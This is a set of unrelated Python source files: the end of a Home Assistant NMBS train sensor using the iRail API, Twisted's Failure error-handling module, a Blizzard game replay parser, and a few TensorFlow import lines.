station_to = config[CONF_STATION_TO]
station_live = config.get(CONF_STATION_LIVE)
excl_vias = config[CONF_EXCLUDE_VIAS]
sensors = [NMBSSensor(
api_client, name, show_on_map, station_from, station_to, excl_vias)]
if station_live is not None:
sensors.append(NMBSLiveBoard(api_client, station_live))
add_entities(sensors, True)
class NMBSLiveBoard(Entity):
"""Get the next train from a station's liveboard."""
def __init__(self, api_client, live_station):
"""Initialize the sensor for getting liveboard data."""
self._station = live_station
self._api_client = api_client
self._attrs = {}
self._state = None
@property
def name(self):
"""Return the sensor default name."""
return "NMBS Live"
@property
def icon(self):
"""Return the default icon or an alert icon if delays."""
if self._attrs and int(self._attrs['delay']) > 0:
return DEFAULT_ICON_ALERT
return DEFAULT_ICON
@property
def state(self):
"""Return sensor state."""
return self._state
@property
def device_state_attributes(self):
"""Return the sensor attributes if data is available."""
if self._state is None or not self._attrs:
return None
delay = get_delay_in_minutes(self._attrs["delay"])
departure = get_time_until(self._attrs['time'])
attrs = {
'departure': "In {} minutes".format(departure),
'extra_train': int(self._attrs['isExtra']) > 0,
'vehicle_id': self._attrs['vehicle'],
'monitored_station': self._station,
ATTR_ATTRIBUTION: "https://api.irail.be/",
}
if delay > 0:
attrs['delay'] = "{} minutes".format(delay)
return attrs
def update(self):
"""Set the state equal to the next departure."""
liveboard = self._api_client.get_liveboard(self._station)
next_departure = liveboard['departures']['departure'][0]
self._attrs = next_departure
self._state = "Track {} - {}".format(
next_departure['platform'], next_departure['station'])
class NMBSSensor(Entity):
"""Get the the total travel time for a given connection."""
def __init__(self, api_client, name, show_on_map,
station_from, station_to, excl_vias):
"""Initialize the NMBS connection sensor."""
self._name = name
self._show_on_map = show_on_map
self._api_client = api_client
self._station_from = station_from
self._station_to = station_to
self._excl_vias = excl_vias
self._attrs = {}
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return 'min'
@property
def icon(self):
"""Return the sensor default icon or an alert icon if any delay."""
if self._attrs:
delay = get_delay_in_minutes(self._attrs['departure']['delay'])
if delay > 0:
return "mdi:alert-octagon"
return "mdi:train"
@property
def device_state_attributes(self):
"""Return sensor attributes if data is available."""
if self._state is None or not self._attrs:
return None
delay = get_delay_in_minutes(self._attrs['departure']['delay'])
departure = get_time_until(self._attrs['departure']['time'])
attrs = {
'departure': "In {} minutes".format(departure),
'destination': self._station_to,
'direction': self._attrs['departure']['direction']['name'],
"platform_arriving": self._attrs['arrival']['platform'],
"platform_departing": self._attrs['departure']['platform'],
"vehicle_id": self._attrs['departure']['vehicle'],
ATTR_ATTRIBUTION: "https://api.irail.be/",
}
if self._show_on_map and self.station_coordinates:
attrs[ATTR_LATITUDE] = self.station_coordinates[0]
attrs[ATTR_LONGITUDE] = self.station_coordinates[1]
if self.is_via_connection and not self._excl_vias:
via = self._attrs['vias']['via'][0]
attrs['via'] = via['station']
attrs['via_arrival_platform'] = via['arrival']['platform']
attrs['via_transfer_platform'] = via['departure']['platform']
attrs['via_transfer_time'] = get_delay_in_minutes(
via['timeBetween']
) + get_delay_in_minutes(via['departure']['delay'])
if delay > 0:
attrs['delay'] = "{} minutes".format(delay)
return attrs
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def station_coordinates(self):
"""Get the lat, long coordinates for station."""
if self._state is None or not self._attrs:
return []
latitude = float(self._attrs['departure']['stationinfo']['locationY'])
longitude = float(self._attrs['departure']['stationinfo']['locationX'])
return [latitude, longitude]
@property
def is_via_connection(self):
"""Return whether the connection goes through another station."""
if not self._attrs:
return False
return 'vias' in self._attrs and int(self._attrs['vias']['number']) > 0
def update(self):
"""Set the state to the duration of a connection."""
connections = self._api_client.get_connections(
self._station_from, self._station_to)
if int(connections['connection'][0]['departure']['left']) > 0:
next_connection = connections['connection'][1]
else:
next_connection = connections['connection'][0]
self._attrs = next_connection
if self._excl_vias and self.is_via_connection:
_LOGGER.debug("Skipping update of NMBSSensor \
because this connection is a via")
return
duration = get_ride_duration(
next_connection['departure']['time'],
next_connection['arrival']['time'],
next_connection['departure']['delay'],
)
self._state = duration
| |
# -*- test-case-name: twisted.test.test_failure -*-
# See also test suite twisted.test.test_pbfailure
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Asynchronous-friendly error mechanism.
See L{Failure}.
"""
# System Imports
import sys
import linecache
import inspect
import opcode
from cStringIO import StringIO
import reflect
count = 0
traceupLength = 4
class DefaultException(Exception):
pass
def format_frames(frames, write, detail="default"):
"""Format and write frames.
@param frames: is a list of frames as used by Failure.frames, with
each frame being a list of
(funcName, fileName, lineNumber, locals.items(), globals.items())
@type frames: list
@param write: this will be called with formatted strings.
@type write: callable
@param detail: Three detail levels are available:
default, brief, and verbose.
@type detail: string
"""
if detail not in ('default', 'brief', 'verbose'):
raise ValueError, "Detail must be default, brief, or verbose. (not %r)" % (detail,)
w = write
if detail == "brief":
for method, filename, lineno, localVars, globalVars in frames:
w('%s:%s:%s\n' % (filename, lineno, method))
elif detail == "default":
for method, filename, lineno, localVars, globalVars in frames:
w( ' File "%s", line %s, in %s\n' % (filename, lineno, method))
w( ' %s\n' % linecache.getline(filename, lineno).strip())
elif detail == "verbose":
for method, filename, lineno, localVars, globalVars in frames:
w("%s:%d: %s(...)\n" % (filename, lineno, method))
w(' [ Locals ]\n')
# Note: the repr(val) was (self.pickled and val) or repr(val)))
for name, val in localVars:
w(" %s : %s\n" % (name, repr(val)))
w(' ( Globals )\n')
for name, val in globalVars:
w(" %s : %s\n" % (name, repr(val)))
# slyphon: i have a need to check for this value in trial
# so I made it a module-level constant
EXCEPTION_CAUGHT_HERE = "--- <exception caught here> ---"
class NoCurrentExceptionError(Exception):
"""
Raised when trying to create a Failure from the current interpreter
exception state and there is no current exception state.
"""
class _Traceback(object):
"""
Fake traceback object which can be passed to functions in the standard
library L{traceback} module.
"""
def __init__(self, frames):
"""
Construct a fake traceback object using a list of frames. Note that
although frames generally include locals and globals, this information
is not kept by this object, since locals and globals are not used in
standard tracebacks.
@param frames: [(methodname, filename, lineno, locals, globals), ...]
"""
assert len(frames) > 0, "Must pass some frames"
head, frames = frames[0], frames[1:]
name, filename, lineno, localz, globalz = head
self.tb_frame = _Frame(name, filename)
self.tb_lineno = lineno
if len(frames) == 0:
self.tb_next = None
else:
self.tb_next = _Traceback(frames)
class _Frame(object):
"""
A fake frame object, used by L{_Traceback}.
"""
def __init__(self, name, filename):
self.f_code = _Code(name, filename)
self.f_globals = {}
class _Code(object):
"""
A fake code object, used by L{_Traceback} via L{_Frame}.
"""
def __init__(self, name, filename):
self.co_name = name
self.co_filename = filename
class Failure:
"""A basic abstraction for an error that has occurred.
This is necessary because Python's built-in error mechanisms are
inconvenient for asynchronous communication.
@ivar value: The exception instance responsible for this failure.
@ivar type: The exception's class.
"""
pickled = 0
stack = None
# The opcode of "yield" in Python bytecode. We need this in _findFailure in
# order to identify whether an exception was thrown by a
# throwExceptionIntoGenerator.
_yieldOpcode = chr(opcode.opmap["YIELD_VALUE"])
def __init__(self, exc_value=None, exc_type=None, exc_tb=None):
"""Initialize me with an explanation of the error.
By default, this will use the current X{exception}
(L{sys.exc_info}()). However, if you want to specify a
particular kind of failure, you can pass an exception as an
argument.
If no C{exc_value} is passed, then an "original" Failure will
be searched for. If the current exception handler that this
Failure is being constructed in is handling an exception
raised by L{raiseException}, then this Failure will act like
the original Failure.
"""
global count
count = count + 1
self.count = count
self.type = self.value = tb = None
#strings Exceptions/Failures are bad, mmkay?
if isinstance(exc_value, (str, unicode)) and exc_type is None:
import warnings
warnings.warn(
"Don't pass strings (like %r) to failure.Failure (replacing with a DefaultException)." %
exc_value, DeprecationWarning, stacklevel=2)
exc_value = DefaultException(exc_value)
stackOffset = 0
if exc_value is None:
exc_value = self._findFailure()
if exc_value is None:
self.type, self.value, tb = sys.exc_info()
if self.type is None:
raise NoCurrentExceptionError()
stackOffset = 1
elif exc_type is None:
if isinstance(exc_value, Exception):
self.type = exc_value.__class__
else: #allow arbitrary objects.
self.type = type(exc_value)
self.value = exc_value
else:
self.type = exc_type
self.value = exc_value
if isinstance(self.value, Failure):
self.__dict__ = self.value.__dict__
return
if tb is None:
if exc_tb:
tb = exc_tb
# else:
# log.msg("Erf, %r created with no traceback, %s %s." % (
# repr(self), repr(exc_value), repr(exc_type)))
# for s in traceback.format_stack():
# log.msg(s)
frames = self.frames = []
stack = self.stack = []
# added 2003-06-23 by Chris Armstrong. Yes, I actually have a
# use case where I need this traceback object, and I've made
# sure that it'll be cleaned up.
self.tb = tb
if tb:
f = tb.tb_frame
elif not isinstance(self.value, Failure):
# we don't do frame introspection since it's expensive,
# and if we were passed a plain exception with no
# traceback, it's not useful anyway
f = stackOffset = None
while stackOffset and f:
# This excludes this Failure.__init__ frame from the
# stack, leaving it to start with our caller instead.
f = f.f_back
stackOffset -= 1
# Keeps the *full* stack. Formerly in spread.pb.print_excFullStack:
#
# The need for this function arises from the fact that several
# PB classes have the peculiar habit of discarding exceptions
# with bareword "except:"s. This premature exception
# catching means tracebacks generated here don't tend to show
# what called upon the PB object.
while f:
localz = f.f_locals.copy()
if f.f_locals is f.f_globals:
globalz = {}
else:
globalz = f.f_globals.copy()
for d in globalz, localz:
if d.has_key("__builtins__"):
del d["__builtins__"]
stack.insert(0, [
f.f_code.co_name,
f.f_code.co_filename,
f.f_lineno,
localz.items(),
globalz.items(),
])
f = f.f_back
while tb is not None:
f = tb.tb_frame
localz = f.f_locals.copy()
if f.f_locals is f.f_globals:
globalz = {}
else:
globalz = f.f_globals.copy()
for d in globalz, localz:
if d.has_key("__builtins__"):
del d["__builtins__"]
frames.append([
f.f_code.co_name,
f.f_code.co_filename,
tb.tb_lineno,
localz.items(),
globalz.items(),
])
tb = tb.tb_next
if inspect.isclass(self.type) and issubclass(self.type, Exception):
parentCs = reflect.allYourBase(self.type)
self.parents = map(reflect.qual, parentCs)
self.parents.append(reflect.qual(self.type))
else:
self.parents = [self.type]
def trap(self, *errorTypes):
"""Trap this failure if its type is in a predetermined list.
This allows you to trap a Failure in an error callback. It will be
automatically re-raised if it is not a type that you expect.
The reason for having this particular API is because it's very useful
in Deferred errback chains:
| def _ebFoo(self, failure):
| r = failure.trap(Spam, Eggs)
| print 'The Failure is due to either Spam or Eggs!'
| if r == Spam:
| print 'Spam did it!'
| elif r == Eggs:
| print 'Eggs did it!'
If the failure is not a Spam or an Eggs, then the Failure
will be 'passed on' to the next errback.
@type errorTypes: L{Exception}
"""
error = self.check(*errorTypes)
if not error:
raise self
return error
def check(self, *errorTypes):
"""Check if this failure's type is in a predetermined list.
@type errorTypes: list of L{Exception} classes or
fully-qualified class names.
@returns: the matching L{Exception} type, or None if no match.
"""
for error in errorTypes:
err = error
if inspect.isclass(error) and issubclass(error, Exception):
err = reflect.qual(error)
if err in self.parents:
return error
return None
def raiseException(self):
"""
raise the original exception, preserving traceback
information if available.
"""
raise self.type, self.value, self.tb
def throwExceptionIntoGenerator(self, g):
"""
Throw the original exception into the given generator,
preserving traceback information if available.
@return: The next value yielded from the generator.
@raise StopIteration: If there are no more values in the generator.
@raise anything else: Anything that the generator raises.
"""
return g.throw(self.type, self.value, self.tb)
def _findFailure(cls):
"""
Find the failure that represents the exception currently in context.
"""
tb = sys.exc_info()[-1]
if not tb:
return
secondLastTb = None
lastTb = tb
while lastTb.tb_next:
secondLastTb = lastTb
lastTb = lastTb.tb_next
lastFrame = lastTb.tb_frame
# NOTE: f_locals.get('self') is used rather than
# f_locals['self'] because psyco frames do not contain
# anything in their locals() dicts. psyco makes debugging
# difficult anyhow, so losing the Failure objects (and thus
# the tracebacks) here when it is used is not that big a deal.
# handle raiseException-originated exceptions
if lastFrame.f_code is cls.raiseException.func_code:
return lastFrame.f_locals.get('self')
# handle throwExceptionIntoGenerator-originated exceptions
# this is tricky, and differs if the exception was caught
# inside the generator, or above it:
# it is only really originating from
# throwExceptionIntoGenerator if the bottom of the traceback
# is a yield.
# Pyrex and Cython extensions create traceback frames
# with no co_code, but they can't yield so we know it's okay to just return here.
if ((not lastFrame.f_code.co_code) or
lastFrame.f_code.co_code[lastTb.tb_lasti] != cls._yieldOpcode):
return
# if the exception was caught above the generator.throw
# (outside the generator), it will appear in the tb (as the
# second last item):
if secondLastTb:
frame = secondLastTb.tb_frame
if frame.f_code is cls.throwExceptionIntoGenerator.func_code:
return frame.f_locals.get('self')
# if the exception was caught below the generator.throw
# (inside the generator), it will appear in the frames' linked
# list, above the top-level traceback item (which must be the
# generator frame itself, thus its caller is
# throwExceptionIntoGenerator).
frame = tb.tb_frame.f_back
if frame and frame.f_code is cls.throwExceptionIntoGenerator.func_code:
return frame.f_locals.get('self')
_findFailure = classmethod(_findFailure)
def __repr__(self):
return "<%s %s>" % (self.__class__, self.type)
def __str__(self):
return "[Failure instance: %s]" % self.getBriefTraceback()
def __getstate__(self):
"""Avoid pickling objects in the traceback.
"""
if self.pickled:
return self.__dict__
c = self.__dict__.copy()
c['frames'] = [
[
v[0], v[1], v[2],
[(j[0], reflect.safe_repr(j[1])) for j in v[3]],
[(j[0], reflect.safe_repr(j[1])) for j in v[4]]
] for v in self.frames
]
# added 2003-06-23. See comment above in __init__
c['tb'] = None
if self.stack is not None:
# XXX: This is a band-aid. I can't figure out where these
# (failure.stack is None) instances are coming from.
c['stack'] = [
[
v[0], v[1], v[2],
[(j[0], reflect.safe_repr(j[1])) for j in v[3]],
[(j[0], reflect.safe_repr(j[1])) for j in v[4]]
] for v in self.stack
]
c['pickled'] = 1
return c
def cleanFailure(self):
"""Remove references to other objects, replacing them with strings.
"""
self.__dict__ = self.__getstate__()
def getTracebackObject(self):
"""
Get an object that represents this Failure's stack that can be passed
to traceback.extract_tb.
If the original traceback object is still present, return that. If this
traceback object has been lost but we still have the information,
return a fake traceback object (see L{_Traceback}). If there is no
traceback information at all, return None.
"""
if self.tb is not None:
return self.tb
elif len(self.frames) > 0:
return _Traceback(self.frames)
else:
return None
def getErrorMessage(self):
"""Get a string of the exception which caused this Failure."""
if isinstance(self.value, Failure):
return self.value.getErrorMessage()
return reflect.safe_str(self.value)
def getBriefTraceback(self):
io = StringIO()
self.printBriefTraceback(file=io)
return io.getvalue()
def getTraceback(self, elideFrameworkCode=0, detail='default'):
io = StringIO()
self.printTraceback(file=io, elideFrameworkCode=elideFrameworkCode, detail=detail)
return io.getvalue()
def printTraceback(self, file=None, elideFrameworkCode=0, detail='default'):
"""Emulate Python's standard error reporting mechanism.
"""
if file is None:
#file = log.logerr
file = sys.stderr # changed by teratorn
w = file.write
# Preamble
if detail == 'verbose':
w( '*--- Failure #%d%s---\n' %
(self.count,
(self.pickled and ' (pickled) ') or ' '))
elif detail == 'brief':
if self.frames:
hasFrames = 'Traceback'
else:
hasFrames = 'Traceback (failure with no frames)'
w("%s: %s: %s\n" % (hasFrames, self.type, self.value))
else:
w( 'Traceback (most recent call last):\n')
# Frames, formatted in appropriate style
if self.frames:
if not elideFrameworkCode:
format_frames(self.stack[-traceupLength:], w, detail)
w("%s\n" % (EXCEPTION_CAUGHT_HERE,))
format_frames(self.frames, w, detail)
elif not detail == 'brief':
# Yeah, it's not really a traceback, despite looking like one...
w("Failure: ")
# postamble, if any
if not detail == 'brief':
# Unfortunately, self.type will not be a class object if this
# Failure was created implicitly from a string exception.
# qual() doesn't make any sense on a string, so check for this
# case here and just write out the string if that's what we
# have.
if isinstance(self.type, (str, unicode)):
w(self.type + "\n")
else:
w("%s: %s\n" % (reflect.qual(self.type),
reflect.safe_str(self.value)))
# chaining
if isinstance(self.value, Failure):
# TODO: indentation for chained failures?
file.write(" (chained Failure)\n")
self.value.printTraceback(file, elideFrameworkCode, detail)
if detail == 'verbose':
w('*--- End of Failure #%d ---\n' % self.count)
def printBriefTraceback(self, file=None, elideFrameworkCode=0):
"""Print a traceback as densely as possible.
"""
self.printTraceback(file, elideFrameworkCode, detail='brief')
def printDetailedTraceback(self, file=None, elideFrameworkCode=0):
"""Print a traceback with detailed locals and globals information.
"""
self.printTraceback(file, elideFrameworkCode, detail='verbose')
# slyphon: make post-morteming exceptions tweakable
DO_POST_MORTEM = True
def _debuginit(self, exc_value=None, exc_type=None, exc_tb=None,
Failure__init__=Failure.__init__.im_func):
if (exc_value, exc_type, exc_tb) == (None, None, None):
exc = sys.exc_info()
if not exc[0] == self.__class__ and DO_POST_MORTEM:
print "Jumping into debugger for post-mortem of exception '%s':" % exc[1]
import pdb
pdb.post_mortem(exc[2])
Failure__init__(self, exc_value, exc_type, exc_tb)
def startDebugMode():
"""Enable debug hooks for Failures."""
Failure.__init__ = _debuginit
# Sibling imports - at the bottom and unqualified to avoid unresolvable
# circularity
#import log # commented by teratorn
| |
from datetime import datetime
import hashlib
# Library to read Blizzards MPYQ files
import mpyq
# Import the oldest protocol to read the replay header, which works with every
# replay version
from s2protocol import protocol15405
from heroprotocol import protocol29406
## Evaluates blizzard based replays and provides several methods to get data out of it.
#
# Currently provides these methods/data:
# - Get the match winner
# - Get a match object containing several information of the match
class teBlizzardReplayParser:
replayHeader = {}
replayDetails = {}
replayInitData = {}
replayGameEvents = []
replayMessageEvents = []
replayTrackerEvents = []
replayAttributeEvents = []
# Events counting into the APM of a player
apmEvents = ['NNet.Game.SSelectionDeltaEvent',
'NNet.Game.SCmdEvent',
'NNet.Game.SControlGroupUpdateEvent'
# 'NNet.Game.SGameUserLeaveEvent',
# 'NNet.Game.STriggerPortraitLoadedEvent',
# 'NNet.Game.SCameraUpdateEvent',
# 'NNet.Game.SCameraSaveEvent'
]
# Mapping of gamespeed indentifiers
gamespeeds = {0: 'Slower',
1: 'Slow',
2: 'Normal',
3: 'Fast',
4: 'Faster'}
# Mapping of region codes
regionCodes = {1: 'us', # us.battle.net
2: 'eu', # eu.battle.net
3: 'kr', # kr.battle.net
5: 'cn', # cn.battle.net
6: 'sea'} # sea.battle.net
# "Constants"
PLAYER_CONTROL_HUMAN = 2
PLAYER_CONTROL_AI = 3
PLAYER_OBSERVE_IS_NO_OBSERVER = 0
PLAYER_OBSERVE_IS_OBSERVER = 1
PLAYER_OBSERVE_IS_HOST = 2
RESULT_WINNER = 1
RESULT_LOSER = 2
GAME_PROTOCOLS = {
"sc2" : {
"protocol": "s2protocol",
"programId": "S2"
},
"hero": {
"protocol": "heroprotocol",
"programId": "Hero"
}
}
## Constructor of teBlizzardReplayParser.
#
# Creates an instance of the mpq-archive reader, reads the replay header
# to find out the base build of the replay and therefore load the correct
# protocol version. Will raise an exception if the basebuild is unknown.
#
# Fallback to sc2 for backward compatible reasons
def __init__(self, replayFilename, game="sc2"):
if game not in self.GAME_PROTOCOLS:
raise UnknownGameException(game)
self.game = game
self.replayFilename = replayFilename
self.mpqArchive = mpyq.MPQArchive(self.replayFilename)
# The header's baseBuild determines which protocol to use (this works with every version)
baseBuild = self.getHeader()['m_version']['m_baseBuild']
packageName = self.GAME_PROTOCOLS[game]["protocol"]
if __package__ is not None:
packageName = '%s.%s' % (__package__, packageName)
try:
# Will raise an ImportError-exception if the basebuild is unknown
self.protocol = __import__(packageName + '.protocol%s' % baseBuild, fromlist=[packageName])
except ImportError:
raise UnknownBaseBuildException(baseBuild)
def getHeader(self):
if len(self.replayHeader) <= 0:
# Read the protocol header, this can be read with any protocol
self.replayHeader = protocol15405.decode_replay_header(self.mpqArchive.header['user_data_header']['content'])
return self.replayHeader
def getDetails(self):
if len(self.replayDetails) <= 0:
self.replayDetails = self.protocol.decode_replay_details(self.mpqArchive.read_file('replay.details'))
# Some old replays also (adidtionally to the initData) have these senseless cache_handles including invalid unicode chars
# del self.replayDetails['m_cacheHandles']
return self.replayDetails
def getInitData(self):
if len(self.replayInitData) <= 0:
self.replayInitData = self.protocol.decode_replay_initdata(self.mpqArchive.read_file('replay.initData'))
# Drop these senseless cache_handles including invalid unicode chars
del self.replayInitData['m_syncLobbyState']['m_gameDescription']['m_cacheHandles']
return self.replayInitData
def getGameEvents(self):
if len(self.replayGameEvents) <= 0:
# This returns only a generator, we have to iterate through it to get all the events
gameGenerator = self.protocol.decode_replay_game_events(self.mpqArchive.read_file('replay.game.events'))
for event in gameGenerator:
self.replayGameEvents.append(event)
return self.replayGameEvents
def getMessageEvents(self):
if len(self.replayMessageEvents) <= 0:
# This returns only a generator, we have to iterate through it to get all the events
messageGenerator = self.protocol.decode_replay_message_events(self.mpqArchive.read_file('replay.message.events'))
for event in messageGenerator:
self.replayMessageEvents.append(event)
return self.replayMessageEvents
def getTrackerEvents(self):
if len(self.replayTrackerEvents) <= 0:
# This returns only a generator, we have to iterate through it to get all the events
trackerGenerator = self.protocol.decode_replay_tracker_events(self.mpqArchive.read_file('replay.tracker.events'))
for event in trackerGenerator:
if event.has_key('m_unitTagIndex') and event.has_key('m_unitTagRecycle'):
# Directky generate the unit_tag, as we will need it anyways.
event['_unit_tag'] = self.protocol.unit_tag(event['m_unitTagIndex'], event['m_unitTagRecycle'])
self.replayTrackerEvents.append(event)
return self.replayTrackerEvents
def getAttributeEvents(self):
if len(self.replayAttributeEvents) <= 0:
self.replayAttributeEvents = self.protocol.decode_replay_attributes_events(self.mpqArchive.read_file('replay.attributes.events'))
return self.replayAttributeEvents
## Remove some HTML from a string.
#
# Remove known HTML which appears in strings. Currently:
# <sp/>
#
# @param self The object pointer.
# @param string The string to remove the HTML from.
#
# @return string The tydied string.
def stripHtmlFromString(self, string):
return string.replace('<sp/>', ' ')
## Remove zero bytes (\x00) from a string.
#
# Some strings contain zero bytes which destroys the string
#
# @param self The object pointer.
# @param string The string to remove the zero bytes from.
#
# @return string The tydied string.
def stripZeroBytesFromString(self, string):
return str(string.strip(u'\u0000'))
## Convert a Windows NT timestamp to a UNIX timestamp.
#
# Windows has it's own timestamp format and Blizzard uses it. This method
# decodes this timestamp using a tutorial linked in the @see.
#
# @param self The object pointer.
# @param ntTimestamp The Windows NT timestamp to convert.
#
# @see http://support.citrix.com/article/CTX109645
#
# @return int The UNIX timestamp for the given NT timestamp.
def convertWindowsNtTimestampToUnixTimestamp(self, ntTimestamp):
return int((ntTimestamp / 10000000) - 11644473600)
# Alternative way would be to substract the 100 nanoseconds since
# 1601-01-01 and convert it to seconds:
# (ntTimestamp - 134774 * 24 * 60 * 60 * 10**7) / 10**7
# return int((ntTimestamp - 116444736000000000) / 10**7)
## Convert the timezone offset from nanoseconds to hours.
#
# The timezone offset is stored as 100 nanosends, so for example UTC+2
# would be 2 * 60*60*10^7 = 72000000000.
#
# @param self The object pointer.
# @param ntTimestamp The UTC timezone offset in 100 nanoseconds
#
# @return int The UTC timezone offset in hours
def convertTimezoneOffsetToUtcTimezone(self, timezoneOffset):
# 60*60*10^7 = 36000000000
return timezoneOffset / 36000000000
## Returns the player-dict for a given toon.
#
# Steps through all players and immediately stops and returns the player
# for the given toon. The toon seems to be the battlenet-worldwide-unique
# identifier of a player.
#
# @param self The object pointer.
# @param toon The unique identifier to find the player for.
#
# @return dict|None The player dict or None if not found.
def getPlayerEntryForToon(self, toon):
playersList = self.getDetails()['m_playerList']
for i, player in enumerate(playersList):
# There are invalid chars (0bytes or sth) in these strings. so strip them before and convert it back from unicode- to regular string
player['m_toon']['m_programId'] = self.stripZeroBytesFromString(player['m_toon']['m_programId'])
playerToon = str(player['m_toon']['m_region']) + '-' + player['m_toon']['m_programId'] + '-' + str(player['m_toon']['m_realm']) + '-' + str(player['m_toon']['m_id'])
if playerToon == toon:
player['m_playerId'] = i + 1
return player;
return None
## Returns the player-dict for a given workingSetSlotId.
#
# Steps through all players and immediately stops and returns the player
# for the given workingSetSlotId.
#
# @param self The object pointer.
# @param toon The workingSetSlotId to find the player for.
#
# @return dict|None The player dict or None if not found.
def getPlayerEntryForSlotId(self, slotId):
playersList = self.getDetails()['m_playerList']
for i, player in enumerate(playersList):
# There are invalid chars (0bytes or sth) in these strings. so strip them before and convert it back from unicode- to regular string
player['m_toon']['m_programId'] = self.stripZeroBytesFromString(player['m_toon']['m_programId'])
if player['m_workingSetSlotId'] == slotId:
player['m_playerId'] = i + 1
return player;
return None
## Returns the player-dict who has won the match.
#
# Steps through all players and immediately stops and returns the player
# when found.
#
# @param self The object pointer.
#
# @return dict|None The winning player dict or None if not found.
def getMatchWinner(self):
playersList = self.getDetails()['m_playerList']
for player in playersList:
if player['m_result'] == self.RESULT_WINNER:
return player
return None
## Returns the match size / game mode (XonX).
#
# Looks up the special attribute scope 16, containing general match
# attributes, and looks for attribute 2001, the match size.
#
# @param self The object pointer.
#
# @return string|None The match size in format 'XvX' or None if not found.
def getGameMode(self):
attributeEvents = self.getAttributeEvents()
if 16 in attributeEvents['scopes']:
if 2001 in attributeEvents['scopes'][16]:
return attributeEvents['scopes'][16][2001][0]['value']
return None
## Tries to generate a unique md5 hash, like a matchId.
#
# This hash tries to be a battlenet-matchId replacement, but is NOT
# guaranteed to be globally unique!
# But it's unique enough to determine the rounds of a bestOfX match for
# example. That means that every replay from any participant (player,
# observer, etc.) of a single match generates the same hash, so you
# know which replays belong to one match and therefore for one round
# in a bestOfX match.
# For generating the hash, the userIds assigned to the toonHandles of every
# player is used, plus the randomSeed, which is randomly generated per
# match, but is not unique!
#
# @param self The object pointer.
# @param players The list of players, generated by self.getMatchDetails()
#
# @return string The generated replayHash
def generateReplayHash(self, players):
initData = self.getInitData()
hashData = []
# Iterate over our playerList and concatinate the userId with the
# toonHandle
for key, player in players['humans'].items():
hashData.append(str(player['user_id']) + ':' + player['toon']['handle'])
# Also append the randomSeed, which makes it kinda "unique"
hashData.append(str(initData['m_syncLobbyState']['m_lobbyState']['m_randomSeed']))
# Hash our data with the md5 algorithm and return it
return hashlib.md5(';'.join(hashData)).hexdigest()
## Returns the match document incl. various information about the match.
#
# Builds the match document with the list of players, observers, computers,
# map name, the matcwinner, duration, matchtime, etc...
#
# @param self The object pointer.
#
# @return dict The match document.
def getMatchDetails(self):
details = self.getDetails()
header = self.getHeader()
initData = self.getInitData()
playersInLobby = initData['m_syncLobbyState']['m_userInitialData']
slots = initData['m_syncLobbyState']['m_lobbyState']['m_slots']
players = {'humans': {},
'computers': {}}
observers = {}
teams = []
matchWinnerToon = -1
matchWinnerTeam = -1
# TODO: This loop may need some refactoring to make it less complex (e.g. too much if/else)!
for slot in slots:
# AIs don't have a userId, so we have to get the playername via the playerList
if slot['m_control'] == self.PLAYER_CONTROL_AI:
player = self.getPlayerEntryForSlotId(slot['m_workingSetSlotId'])
playerName = self.stripHtmlFromString(player['m_name'] if player['m_name'] else '')
clanTag = ''
userId = -1
# AIs also don't have a toon, but we need them! So generate an 'invalid' one out of the playerId
toonHandle = '0-' + str(self.GAME_PROTOCOLS[self.game]["programId"]) + '-0-' + str(player['m_playerId'])
elif slot['m_userId'] != None:
userId = slot['m_userId']
playerName = self.stripHtmlFromString(playersInLobby[userId]['m_name'] if playersInLobby[userId]['m_name'] else '')
clanTag = self.stripHtmlFromString(playersInLobby[userId]['m_clanTag'] if playersInLobby[userId]['m_clanTag'] else '')
toonHandle = slot['m_toonHandle']
else:
continue
# Create a dict containg information for every type of user
data = {'user_id': userId,
#Some kind of a unique identifier
'toon': {'handle': toonHandle},
'name': playerName,
'clan_tag': clanTag,
'fullname': (('[' + clanTag + ']') if len(clanTag) > 0 else '') + playerName,
'team_id': slot['m_teamId']}
# Collect all teamIDs
if not data['team_id'] in teams:
teams.append(data['team_id'])
if slot['m_observe'] > self.PLAYER_OBSERVE_IS_NO_OBSERVER:
observers[toonHandle] = data
else:
player = self.getPlayerEntryForSlotId(slot['m_workingSetSlotId'])
# Something strange happend: The user is not in the playerslist!
if player == None:
continue
# Is this the matchwinner (for team matches, the toonHandle doesn't matter)?
if player['m_result'] == self.RESULT_WINNER:
matchWinnerToon = toonHandle
matchWinnerTeam = data['team_id']
data.update({'player_id': player['m_playerId'],
'toon': dict(data['toon'].items() + {'programId': player['m_toon']['m_programId'],
'region': player['m_toon']['m_region'],
'id': player['m_toon']['m_id'],
'realm': player['m_toon']['m_realm']}.items()),
'race': player['m_race'],
'result': player['m_result'],
'color': {'r': player['m_color']['m_r'],
'g': player['m_color']['m_g'],
'b': player['m_color']['m_b'],
'a': player['m_color']['m_a']
}})
if slot['m_control'] == self.PLAYER_CONTROL_AI:
players['computers'][toonHandle] = data
else:
players['humans'][toonHandle] = data
gameMode = self.getGameMode()
# Fallback, if the attribute couldn't be found
if not gameMode:
playersPerTeam = len(players['humans']) / len(teams)
gameMode = '%dv%d' % (playersPerTeam, playersPerTeam)
return {'mapname': details['m_title'],
'replay_hash': self.generateReplayHash(players),
'started_at': datetime.fromtimestamp(self.convertWindowsNtTimestampToUnixTimestamp(details['m_timeUTC'])).strftime('%Y-%m-%d %H:%M:%S'),
'utc_timezone': self.convertTimezoneOffsetToUtcTimezone(details['m_timeLocalOffset']),
'duration': round(header['m_elapsedGameLoops'] / 16),
'winner_toon_handle': matchWinnerToon,
'winner_team_id': matchWinnerTeam,
'version': {'number': str(header['m_version']['m_major']) + '.' + str(header['m_version']['m_minor']) + '.' + str(header['m_version']['m_revision']),
'build': header['m_version']['m_build']},
'gamemode': gameMode,
'gamespeed': self.gamespeeds[initData['m_syncLobbyState']['m_gameDescription']['m_gameSpeed']],
'host_user_id': initData['m_syncLobbyState']['m_lobbyState']['m_hostUserId'] or -1,
'players': players,
'observers': observers}
# End class teBlizzardReplayParser
class UnknownBaseBuildException(Exception):
def __init__(self, baseBuild):
self.baseBuild = baseBuild
def __str__(self):
return 'Unsupported base build %d' % self.baseBuild
class UnknownGameException(Exception):
def __init__(self, game):
self.game = game
def __str__(self):
return 'Unsupported game %s' % self.game
| |
from datasets import dataset_factory
import tensorflow as tf
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
from nets import nets_factory
